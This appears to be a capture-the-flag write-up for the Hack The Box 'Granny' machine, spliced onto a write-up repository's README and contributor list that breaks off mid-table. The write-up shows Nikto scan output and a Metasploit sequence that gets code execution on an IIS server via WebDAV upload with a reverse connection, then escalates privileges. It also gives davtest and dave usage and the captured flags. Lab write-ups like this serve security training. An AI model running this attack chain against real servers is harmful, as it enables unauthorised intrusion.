OSVDB-5646: HTTP method 'DELETE' allows clients to delete files on the web server. + Retrieved dasl header: <DAV:sql> + Retrieved dav header: 1, 2 + Retrieved ms-author-via header: MS-FP/4.0,DAV + Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server. + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server. + Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH + OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server. + OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server. + WebDAV enabled (LOCK UNLOCK SEARCH PROPFIND MKCOL COPY PROPPATCH listed as allowed) + OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll + OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted. + OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found. + OSVDB-3233: /_private/: FrontPage directory found. + OSVDB-3233: /_vti_bin/: FrontPage directory found. + OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information). + OSVDB-3300: /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted). + OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252. + OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST. + /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found. + 8018 requests: 0 error(s) and 32 item(s) reported on remote host + End Time: 2020-11-19 11:40:35 (GMT-5) (583 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ``` * We can look at `/_vti_inf.html` for some extra info * Looking at the html source, it says `<!-- _vti_inf.html version 0.100>` and `FPVersion="5.0.2.6790"` * `_vti_bin/fpcount.exe` apparently might let us execute arbitrary commands # Exploitation ### webdav * On `msfconsole`, we can run the following: 1. `search webdav` 2. `use exploit/windows/iis/iis_webdav_upload_asp` in order to get remote code execution 3. `set RHOST 10.10.10.15` 4. `set LHOST tun0` in order to have the machine connect back to yours 5. `run` 6. `ps` to find processes running with `NT AUTHORITY` 7. `migrate 3416` (pick the process id that your machine is running as described above) 8. `bg` to put the session into the background (keep note of the number) 9. `use post/multi/recon/local_exploit_suggester` in order to find scripts for privesc 10. `set SESSION 1` (use whatever session number your session was backgrounded to) 11. `set SHOWDESCRIPTION true` to see more details for each suggestion 12. `run` 13. `use exploit/windows/local/ms14_070_tcpip_ioctl` because we want to elevate the system 14. `set SESSION 1` 15. `set LHOST tun0` 16. `run` ``` * Now, we should have admin access. If not, go through the process and migrate steps again * We can cd to `C:\Documents and Settings\Lakis\Desktop` * Using the `cat` command on the meterpreter or the `more` command on the shell, we get the user flag: `700c5dc163014e22b3e408f8703f67d1` * We can cd to `C:\Documents and Settings\Administrator\Desktop>` to get the root flag: `aa4beed1c0584445ab463a6747bd06e9` # Notes * When doing stuff with webdav, there are some useful tools to use: ### davtest `davtest -url http://10.10.10.15` will give you a list of files that you can upload, rename, edit, etc. ### dave `dave 10.10.10.15` will show you the full directory of the website, let you traverse it, and even let you upload files
# hackthebox-writeups Writeups for HacktheBox machines (boot2root) and challenges written in Spanish or English. https://www.hackthebox.eu/ ## Important notes about password protection Machines writeups until 2020 March are protected with the corresponding root flag. But since this date, HTB flags are dynamic and different for every user, so is not possible for us to maintain this kind of system. So from now we will accept only password protected challenges, endgames, fortresses and retired machines (that machine write-ups don't need password). For endgames or fortresses, the password should be all the flags concatenated. Since June 2023, to verify flag challenges first contact us ([email protected]). ![hpys_htb_writeups logo](./images/htb_writeup.png) # Disclaimer It is totally forbidden to unprotect (remove the password) and distribute the pdf files of active machines, if we detect any misuse will be reported immediately to the HTB admins. Anyway, all the authors of the writeups of active machines in this repository **are not responsible** for the misuse that can be given to the corresponding documents. Please think that this is done to share techniques not for spoilers. # Submissions If you want to incorporate your own writeup, notes, scripts or other material to solve the boot2root machines and challenges you can do it through a **'pull request'** or by sending us an email to: **hackplayers_at_Ymail.com**. In this way, you will be added to our **top contributors list** (see below) and you will also receive an **invitation link to an exclusive Telegram group** where several hints (not spoilers) are discussed for the HacktheBox machines. Please consider **protecting the text of your writeup** (e.g. not allowing to be copied) so that it can not be easily shared on platforms such as Pastebin. Of course, if someone leaks a writeup of an active machine it is not the responsibility of the author. If we detect someone who does it, they will immediately report to the HTB Staff so they can take the appropriate measures. Note: the minimum requirement to enter the "special" Telegram group is also to have a hacker level or higher (no script kiddies). # Star contributors (+5 writeups) No | ctry | nick | avatar | team | machines | challenges | total writeups --- | --- | --- | --- | --- | --- | --- | --- 1 | <img src="./images/countries/world.png" height="24" width="24"> | Fiti | [<img src="./images/fiti.png" height="42" width="42">](https://www.hackthebox.eu/profile/26241) | [L1k0rD3B3ll0t4](https://www.hackthebox.eu/home/teams/profile/149) | [Bashed,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bashed/fiti-bashed.pdf) [Arctic,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Arctic/fiti-arctic.pdf) [Tenten,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Tenten/fiti-tenten.pdf) [Celestial,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Celestial/fiti-celestial.pdf) [Mirai,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Mirai/fiti-mirai.pdf) [Nibbles,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Nibbles/fiti-nibbles.pdf) [Sunday,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sunday/fiti-sunday.pdf) [Valentine,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Valentine/fiti-valentine.pdf) [Dev0ops, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/DevOops/fiti-dev0ps.pdf) [Aragog, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Aragog/fiti-aragog.pdf) [Canape, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Canape/fiti-canape.pdf) [Mischief, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Mischief/fiti-mischief.pdf) [Jerry, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jerry/fiti-jerry.pdf) [Olympus, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Olympus/fiti-olympus.pdf) [Bounty, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bounty/fiti-bounty.pdf) [Access, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Access/fiti-access.pdf) [Carrier, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Carrier/fiti-carrier.pdf) [Curling, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Curling/fiti-curling.pdf) [Dab, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Dab/fiti-dab.pdf) [Ypuffy, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Ypuffy/fiti-ypuffy.pdf) [Waldo, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Waldo/fiti-waldo.pdf) [Secnotes, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Secnotes/fiti-secnotes.pdf) [Irked, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Irked/fiti-irked.pdf) [Frolic, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Frolic/fiti-frolic.pdf) [Chaos, ](https://github.com/Hackplayers/hackthebox-writeups/tree/master/machines/Chaos/fiti-chaos.pdf) [Fortune, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Fortune/fiti-fortune.pdf) [Friendzone, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Friendzone/fiti-Friendzone.pdf) [Lightweight, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Lightweight/fiti-Lightweight.pdf) [Querier, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Querier/fiti-Querier.pdf) [Help](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Help/fiti-Help.pdf) [Conceal, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Conceal/fiti-conceal.pdf) [CTF, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/CTF/fiti-ctf.pdf) [Netmon, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Netmon/fiti-netmon.pdf) [Sizzle, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sizzle/fiti-sizzle.pdf) [Arkham, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Arkham/fiti-arkham.pdf) [OneTwoSeven, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/OneTwoSeven/fiti-onetwoseven.pdf) [LaCasaDePapel, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/LaCasaDePapel/fiti-lacasadepapel.pdf) [Helpline, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Helpline/fiti-helpline.pdf) [Ghoul, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Ghoul/fiti-ghoul.pdf) [Bastion, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bastion/fiti-bastion.pdf) [Swagshop, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Swagshop/fiti-swagshop.pdf) [Ellingson, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Ellingson/l1k0rd3b3ll0t4-ellingson.pdf) [Writeup, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/writeup/fiti-writeup.pdf) [Chainsaw, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Chainsaw/fiti-Chainsaw.pdf) [Haystack, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Haystack/fiti-Haystack.pdf) [Jarvis, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jarvis/fiti-Jarvis.pdf) [Player, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Player/fiti-Player.pdf) [Smasher2, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Smasher2/fiti-Smasher2.pdf) [Unattended, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Unattended/fiti-Unattended.pdf) [Kryptos](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Kriptos/fiti-Kryptos.pdf) | [Impossible password, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Impossible_password/fiti-impossible-password.pdf) [Widescreen, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Widescreen/fiti-widescreen.pdf) [Unified, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Unified/fiti-unified.pdf) [Milkshake, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Milkshake/fiti-milkshake.pdf) [It's raining blood, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Raining%20Blood/fiti-Its_Raining_Blood.pdf) [Hackerman, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Hackerman/fiti-hackerman.pdf) [Forest, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Forest/fiti-forest.pdf) [Cartographer, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/cartographer/fiti-cartographer.pdf) [0ld is g0ld, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/0ld_is_g0ld/fiti-0ld_is_g0ld.pdf) [HDC, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/HDC/fit-HDC.pdf) [Beatles, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Beatles/fiti-Beatles.pdf) [Brainy's Cipher, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Brainy-s%20Cipher/fiti-BrainysCipher.pdf) [Classic Yet Complicated, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Classic%20Yet%20Complicated/fiti-ClassicYetComplicated.pdf) [Da Vinci, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/DaVinci/fiti-DaVinci.pdf) [Deceitful Batman, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Deceitful_Batman/fiti-DeceitfulBatman.pdf) [Digital Cube, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Digital_Cube/fiti-DigitalCube.pdf) [Keys, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Keys/fiti-Keys.pdf) [Lernaean, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/lernaean/fiti-Lernaean.pdf) [Pusheen Loves Graphs, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Pusheen%20Loves%20Graphs/icebreakcrypt-PusheenLovesGraphs.pdf) [Sick Teacher, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/SickTeacher/fiti-Sick-Teacher.pdf) [Weak RSA, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Weak%20RSA/fiti-Weak-RSA.pdf) [Fuzzy, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Fuzzy/fiti-fuzzy.pdf) [I Know Mag1k, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/iknowmag1k/fiti-I_know_mag1k.pdf) [Grammar](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/grammar/fiti-grammar.pdf) | 74 | 2 | <img src="./images/countries/spain.png" height="24" width="24"> | SirBroccoli | [<img src="./images/SirBroccoli.png" height="42" width="42">](https://www.hackthebox.eu/profile/57519) | [Watch4Hack](https://www.hackthebox.eu/home/teams/profile/401) | [SwagShop, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/SwagShop/SirBroccoli-SwagShop.pdf) [Jarvis, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jarvis/SirBroccoli-Jarvis.pdf) [OneTwoSeven, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/OneTwoSeven/SirBroccoli-OneTwoSeven.pdf) [Haystack, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Haystack/SirBroccoli%20-%20Haystack.pdf) [Heist, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Heist/SirBroccoli-Heist.pdf) [Bitlab, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bitlab/SirBroccoli-Bitlab.pdf) [Wall, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Wall/SirBroccoli-Wall.pdf) [Bankrobber, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bankrobber/SirBroccoli-Bankrobber.pdf) [Postman, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Postman/SirBroccoli-Postman.pdf) [Mango, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Mango/SirBroccoli-Mango.pdf) [AI, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/AI/SirBroccoli-AI.pdf) [Control, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Control/SirBroccoli-Control.pdf) [Obscurity, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Obscurity/SirBroccoli-Obscurity.pdf) [Registry, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Registry/SirBroccoli-Registry.pdf) [Resolute, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Resolute/SirBroccoli-Resolute.pdf) [Sniper, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sniper/SirBroccoli-Sniper.pdf) [JSON, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Json/SirBroccoli-JSON.pdf) [OpenAdmin, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/OpenAdmin/SirBroccoli-OpenAdmin.pdf) [Monteverde, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Monteverde/SirBroccoli-Monteverde.pdf) [Nest, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Nest/SirBroccoli-Nest.pdf) [Sauna, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sauna/SirBroccoli-Sauna.pdf) [Book](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Book/SirBroccoli-Book.pdf) | [Emdee five for life, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Emdee%20five%20for%20life/Sirbroccoli-Emdee%20five%20for%20life.pdf) [Craft, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Craft/SirBroccoli-Craft.pdf) [FreeLancer, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Freelancer/SirBroccoli-FreeLancer.pdf) [Bombs landed, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Bombs%20landed/SirBroccoli-Bombs%20Landed.pdf)[Eat the cake, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Eat%20the%20cake/SirBroccoli-Eat%20the%20Cake.pdf)[Headache, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Headache/SirBroccoli-Headache.pdf)[Find the secret flag, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Find%20the%20secret%20flag/SirBroccoli-Find%20The%20Secret%20Flag.pdf)[Debugme, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Debugme/SirBroccoli-Debugme.pdf)[Impossible password, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Impossible_password/SirBroccoli-Impossible%20Password.pdf)[DSYM, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/DSYM/SirBroccoli-DSYM.pdf)[Snake, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/snake/SirBroccoli-Snake.pdf)[Find the easy pass, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Find_the_easy_pass/SirBroccoli-Find%20The%20Easy%20Pass.pdf)[Obscure, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/SirBroccoli-Obscure.pdf) [Crooked crockford, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Crooked%20Crockford/SirBroccoli-Crooked%20crockford.pdf) [ExploitedStream, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/ExploitedStream/Crooked%20Crockford/SirBroccoli%20-%20ExploitedStream.pdf) [Ropme, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/ropme/SirBroccoli%20-%20Ropme.pdf) [Old Bridge, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/old_bridge/SirBroccoli%20-%20Old%20Bridge.pdf) [Little Tommy, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/Little%20Tommy/SirBroccoli%20-%20Little%20Tommy.pdf) [Ropmev2, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/ropmev2/SirBroccoli%20-%20Ropmev2.pdf) [Baby RE, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Baby%20RE/SirBroccoli%20-%20Baby%20RE.pdf) [headache2, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/headache2/SirBroccoli%20-%20Headache2.pdf) [Breach, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/Breach/SirBroccoli-Breach.pdf) [Easy Phish, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/Easy%20Phish/SirBroccoli-Easy%20Phish.pdf) [Infiltration, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/Infiltration/SirBroccoli-Infiltration.pdf) [We Have a Leak, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/We%20Have%20a%20Leak/SirBroccoli-We%20Have%20a%20Leak.pdf) [Cryptohorrific, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/mobile/SirBroccoli-Cryptohorrific.pdf) [Da Vinci, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/DaVinci/SirBroccoli-Da%20Vinci.pdf) [Digital Cube, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Digital_Cube/SirBroccoli-Digital%20Cube.pdf) [Forest, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Forest/SirBroccoli-Forest.pdf) [Pusheen Loves Graphs, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Pusheen%20Loves%20Graphs/SirBroccoli-Pusheen%20Loves%20Graphs.pdf) [Senseless Behaviour, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Senseless_Behaviour/SirBroccoli-Senseless%20Behaviour.pdf) [Templed, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Templed/SirBroccoli-Templed.pdf) [M0rsarchive, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/M0rsarchive/SirBroccoli-M0rsarchive.pdf) [Interdimensional Internet, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Interdimensional%20Internet/SirBroccoli-Interdimensional%20Internet.pdf) [ezpz, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/ezpz/SirBroccoli-EZPZ.pdf) [Under Construction, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Under%20Construction/SirBroccoli-Under%20Construction.pdf) | 58 | 3 | <img src="./images/countries/france.png" height="24" width="24"> | apehex | [<img src="./images/apehex.png" height="42" width="42">](https://app.hackthebox.eu/users/413156) | Solitaire Wolf | | [Query][apehex-misc-query], [Exatlon][apehex-reversing-exatlon], [quick maffs][apehex-crypto-quick-maffs], [signup][apehex-crypto-signup], [Protein Cookies][apehex-crypto-protein-cookies], [Broken Decryptor][apehex-crypto-broken-decryptor], [Baby Encryption][apehex-crypto-baby-encryption], [Composition][apehex-crypto-composition], [Flippin Bank][apehex-crypto-flippin-bank], [Lost Modulus][apehex-crypto-lost-modulus], [Lost Modulus Again][apehex-crypto-lost-modulus-again], [Luna Crypt][apehex-crypto-luna-crypt], [mysterybox][apehex-crypto-mysterybox], [Nuclear Sale][apehex-crypto-nuclear-sale], [Optimus Prime][apehex-crypto-optimus-prime], [baby quick maffs][apehex-crypto-baby-quick-maffs], [Baby Time Capsule][apehex-crypto-baby-time-capsule], [BBGun06][apehex-crypto-bbgun06], [Embryonic Plant][apehex-crypto-embryonic-plant], [Quantum-Safe][apehex-crypto-quantum-safe], [RLotto][apehex-crypto-rlotto], [Rookie Mistake][apehex-crypto-rookie-mistake], [RsaCtfTool][apehex-crypto-rsa-ctf-tool], [RSAisEasy][apehex-crypto-rsa-is-easy], [The Last Dance][apehex-crypto-the-last-dance], [TwoForOne][apehex-crypto-two-for-one], [xorxorxor][apehex-crypto-xorxorxor], [Diagnostic][apehex-forensics-diagnostic], [emo][apehex-forensics-emo], [MarketDump][apehex-forensics-market-dump], [oBfsC4t10n][apehex-forensics-obfsc4t10n], [oBfsC4t10n2][apehex-forensics-obfsc4t10n2], [Obscure][apehex-forensics-obscure], [Perseverance][apehex-forensics-perseverance], [PersistenceIsFutile][apehex-forensics-persistence-is-futile], [Red Failure][apehex-forensics-red-failure], [USB Ripper][apehex-forensics-usb-ripper], [Window's Infinity Edge][apehex-forensics-windows-infinity-edge] | 38 | 4 | <img src="./images/countries/france.png" height="24" width="24"> | noraj | [<img src="./images/noraj.png" height="42" width="42">](https://www.hackthebox.eu/profile/32519) | [Rawsec](https://www.hackthebox.eu/home/teams/profile/638) | [Academy][noraj-Academy], [Admirer][noraj-Admirer], [Blackfield][noraj-Blackfield], [Blunder][noraj-Blunder], [Book][noraj-Book], [Buff][noraj-Buff], [Cache][noraj-Cache], [Cascade][noraj-Cascade], [Control][noraj-Control], [Doctor][noraj-Doctor], [Dyplesher][noraj-Dyplesher], [Fatty][noraj-Fatty], [ForwardSlash][noraj-ForwardSlash], [Jewel][noraj-Jewel], [Laboratory][noraj-Laboratory], [Magic][noraj-Magic], [Mango][noraj-Mango], [Monteverde][noraj-Monteverde], [Nest][noraj-Nest], [Obscurity][noraj-Obscurity], [Omni][noraj-Omni], [Oouch][noraj-Oouch], [OpenAdmin][noraj-OpenAdmin], [Passage][noraj-Passage], [Remote][noraj-Remote], [Resolute][noraj-Resolute], [ServMon][noraj-ServMon], [SneakyMailer][noraj-SneakyMailer], [Tabby][noraj-Tabby], [Traceback][noraj-Traceback], [Traverxec][noraj-Traverxec], [Worker][noraj-Worker] | | 32 5 | <img src="./images/countries/denmark.png" height="24" width="24"> | crysal | [<img src="./images/crysal.png" height="42" width="42">](https://www.hackthebox.eu/profile/79500) | [SKPH4X](https://www.hackthebox.eu/home/teams/profile/1135) | [Bastion,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bastion/Crysal0_Bastion.pdf) [Writeup,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/writeup/Crysal0_writeup.pdf) [SwagShop](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/SwagShop/Crysal0_SwagShop.pdf) | [Find the easy pass, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Find_the_easy_pass/Crysal0_FindTheEasyPass.pdf) [snake, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/snake/Crysal0_snake.pdf) [Da Vinci, ](https://github.com/Hackplayers/hackthebox-writeups/tree/master/challenges/stego/DaVinci/Crysal0_Da_Vinci.pdf) [Beatles, ](https://github.com/Hackplayers/hackthebox-writeups/tree/master/challenges/stego/Beatles/Crysal0_Beatles.pdf) [BitsNBytes, ](https://github.com/Hackplayers/hackthebox-writeups/tree/master/challenges/stego/BitsNBytes/Crysal0_BitsNBytes.pdf) [Forest, ](https://github.com/Hackplayers/hackthebox-writeups/tree/master/challenges/stego/Forest/Crysal0_Forest.pdf) [hackerman, ](https://github.com/Hackplayers/hackthebox-writeups/tree/master/challenges/stego/Hackerman/Crysal0_hackerman.pdf) [Hidden in Colors, ](https://github.com/Hackplayers/hackthebox-writeups/tree/master/challenges/stego/Hidden%20in%20Colors/Crysal0_Hidden_in_Colors.pdf) [Milkshake, ](https://github.com/Hackplayers/hackthebox-writeups/tree/master/challenges/stego/Milkshake/Crysal0_MilkShake.pdf) [Monstrosity, ](https://github.com/Hackplayers/hackthebox-writeups/tree/master/challenges/stego/Monstrosity/Crysal0_Monstrosity.pdf) [Raining Blood, ](https://github.com/Hackplayers/hackthebox-writeups/tree/master/challenges/stego/Raining%20Blood/Crysal0_Raining_Blood.pdf) [Retro, ](https://github.com/Hackplayers/hackthebox-writeups/tree/master/challenges/stego/Retro/Crysal0_Retro.pdf) [Widescreen, ](https://github.com/Hackplayers/hackthebox-writeups/tree/master/challenges/stego/Widescreen/Crysal0_widescreen.pdf) [Digital Cube, ](https://github.com/Hackplayers/hackthebox-writeups/tree/master/challenges/stego/Digital_Cube/Crysal0_Digital_Cube.pdf) [Pusheen Loves Graphs, ](https://github.com/Hackplayers/hackthebox-writeups/tree/master/challenges/stego/Pusheen%20Loves%20Graphs/Crysal0_Pusheen_Loves_Graphs.pdf) [0ld is g0ld, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/0ld_is_g0ld/Crysal0_0ld_is_g0ld.pdf) [Eternal loop, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Eternal_Loop/Crysal0_Eternal_Loop.pdf) [Blackhole, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Blackhole/Crysal0_Blackhole.pdf) [misDIRection, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/misDIRection/Crysal0_misDIRection.pdf) [fs0ciety, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/fs0ciety/Crysal0_fs0ciety.pdf) [Longbottoms Locker, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Longbottom-s%20Locker/Crysal0_Longbottoms_Locker.pdf) [Inferno, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Inferno/Crysal0_Inferno.pdf) [Grammar, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/grammar/Crysal0_Grammar.pdf) [I know Mag1k, 